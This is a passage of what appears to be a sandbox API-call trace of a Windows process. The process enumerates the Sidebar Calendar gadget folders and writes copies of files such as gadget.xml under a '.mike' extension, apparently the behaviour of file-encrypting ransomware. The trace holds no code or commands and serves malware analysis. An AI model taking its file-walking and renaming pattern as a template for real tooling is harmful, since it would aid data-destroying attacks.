[0131.257] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html", dwFileAttributes=0x80) returned 0 [0131.258] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.mike", lpFilePart=0x0) returned 0x57 [0131.259] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.mike", lpFilePart=0x0) returned 0x57 [0131.261] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.261] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.mike", lpFilePart=0x0) returned 0x54 [0131.262] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml", lpFilePart=0x0) returned 0x4f [0131.265] WriteFile (in: hFile=0x284, lpBuffer=0x22e5620*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22e5620*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.266] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.mike", lpFilePart=0x0) returned 0x54 [0131.266] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.mike", lpFilePart=0x0) returned 0x54 [0131.266] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0131.268] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.mike", lpFilePart=0x0) returned 0x54 [0131.268] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.mike", lpFilePart=0x0) returned 0x54 [0131.269] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1788ca80, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1788ca80, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.269] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4a9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.html", cAlternateFileName="")) returned 1 [0131.269] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0131.269] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0131.269] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0131.269] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.270] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0131.270] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.270] CoTaskMemFree (pv=0x4e1c10) [0131.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.270] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css", lpFilePart=0x0) returned 0x48 [0131.272] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.272] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x12f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.css", cAlternateFileName="")) returned 1 [0131.272] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.273] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.273] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x12f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.css", cAlternateFileName="")) returned 1 [0131.273] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x12f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.css", cAlternateFileName="")) returned 0 [0131.273] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0131.273] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.273] CoTaskMemFree (pv=0x4e1c10) [0131.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.274] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js", lpFilePart=0x0) returned 0x47 [0131.274] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.274] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xff08, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.js", cAlternateFileName="")) returned 1 [0131.274] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.275] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.275] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xff08, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.js", cAlternateFileName="")) returned 1 [0131.275] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xff08, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.js", cAlternateFileName="")) returned 0 [0131.275] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0131.275] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.275] CoTaskMemFree (pv=0x4e1c10) [0131.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.276] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images", lpFilePart=0x0) returned 0x45 [0131.277] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8191f35e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8191f35e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.278] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3769c1c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xb3769c1c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-desk.png", cAlternateFileName="")) returned 1 [0131.278] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e7160b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7e7160b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x557, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-dock.png", cAlternateFileName="")) returned 1 [0131.278] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e9776a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7e9776a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-today.png", cAlternateFileName="")) returned 1 [0131.278] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f55e45, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f55e45, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb378fd7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc9, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-disable.png", cAlternateFileName="")) returned 1 [0131.278] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e9776a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7e9776a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb38745bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x19d, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-down.png", cAlternateFileName="")) returned 1 [0131.278] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ebd8c9, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7ebd8c9, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3a174dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-hot.png", cAlternateFileName="")) returned 1 [0131.278] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ebd8c9, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7ebd8c9, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3a174dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xcb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext.png", cAlternateFileName="")) returned 1 [0131.279] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f55e45, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f55e45, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3a174dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-disable.png", cAlternateFileName="")) returned 1 [0131.279] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ee3a28, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7ee3a28, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3a174dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x199, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-down.png", cAlternateFileName="")) returned 1 [0131.279] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f09b87, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f09b87, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3aafa5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x23e, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-hot.png", cAlternateFileName="")) returned 1 [0131.279] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f09b87, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f09b87, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3ad5bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev.png", cAlternateFileName="")) returned 1 [0131.279] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f7bfa4, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f7bfa4, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3ad5bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x8d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_double.png", cAlternateFileName="")) returned 1 [0131.279] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7fee3c1, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7fee3c1, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3afbd1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbc1, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_double_bkg.png", cAlternateFileName="")) returned 1 [0131.279] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7fee3c1, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7fee3c1, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3afbd1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xdd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_double_orange.png", cAlternateFileName="")) returned 1 [0131.279] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7fee3c1, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7fee3c1, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3afbd1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_ring_docked.png", cAlternateFileName="")) returned 1 [0131.280] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8014520, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8014520, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3b21e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x5dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_single.png", cAlternateFileName="")) returned 1 [0131.280] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb803a67f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb803a67f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3b21e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xdd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_single_bkg.png", cAlternateFileName="")) returned 1 [0131.280] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb803a67f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb803a67f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3b21e7c, 